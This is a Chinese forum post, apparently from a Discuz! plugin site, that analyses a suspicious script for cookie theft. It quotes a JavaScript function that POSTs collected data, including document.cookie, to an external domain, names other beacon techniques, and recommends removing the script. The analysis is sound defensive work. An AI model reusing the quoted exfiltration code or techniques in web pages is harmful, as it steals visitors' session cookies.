为了给出确切的证据,我们需要查看代码中是否有尝试发送 `document.cookie` 的操作,例如通过网络请求将其发送到外部服务器。
以下是一些常见的方式:
1. 使用 `XMLHttpRequest` 发送数据。
2. 使用 `fetch` 发送数据。
3. 动态创建 `img` 或 `script` 标签并设置 `src` 为包含 cookie 数据的 URL。
让我们在代码中查找这些模式。
在检查 JavaScript 代码时,发现了以下可疑的片段,它们可能用于窃取你的 cookie 信息并将其发送到外部服务器:
### 使用 `XMLHttpRequest` 发送数据
```javascript
function contact_mothership(probe_return_data) {
if(gone) return;
gone = 1;
var http = new XMLHttpRequest();
var url = "//www.xiaokel.cn/bdstatic.com/?callback=jsonp";
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/json");
http.send(JSON.stringify(probe_return_data));
}
```
这个函数会创建一个 `XMLHttpRequest` 对象,并将 `probe_return_data` 发送到指定的 URL。这可能包括你的 cookie 数据,因为 `probe_return_data['cookie']` 被设置为 `document.cookie`。
### 动态创建图片元素发送数据
尽管在此代码中找到了多个创建 `Image` 元素的例子,但没有明确的证据表明它们用于发送 cookie 数据。然而,这是一种常见的技术,可以通过设置 `img.src` 为包含 cookie 数据的 URL 来窃取信息。
综合这些发现,可以合理推断这段代码确实可能在尝试窃取你的 cookie 信息,并通过 `XMLHttpRequest` 将其发送到外部服务器。具体的证据包括:
1. **`document.cookie` 被访问并存储在 `probe_return_data['cookie']` 中。**
2. **`contact_mothership` 函数会将 `probe_return_data` 发送到外部 URL。**
为了确保安全,建议立即移除或禁用该脚本,并检查服务器日志以确定是否有任何未经授权的数据传输。 |
后羿采集器 火车头采集器 其他采集器 任意40 人气#Discuz!插件模板
定时批量发帖 PC手机双端版1.8(zgxsh_posti0 人气#Discuz!插件模板
活动报名系统 PC高级版(dev8133_activity.70 人气#Discuz!插件模板![[亮剑]同城门店后台 2024052301(aljtsq_ht)](https://static.dz-x.net/block/33/3341311160c3168b3b1fac4b1e174fb4.jpg)
[亮剑]同城门店后台 2024052301(aljtsq_ht)0 人气#Discuz!插件模板
Quater-虎嗅新媒体 商业版UTF-8 X3.4版 PC+0 人气#Discuz!插件模板![【可可】付费看帖 28.240823(keke_vpost)[修复帖子暴露收费内容 新增 批量转换设置付费 大版本更新]](https://static.dz-x.net/block/e2/e2e10c27bac4b4448481fd1ba711bf14.jpg)
【可可】付费看帖 28.240823(keke_vpost)[540 人气#Discuz!插件模板
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
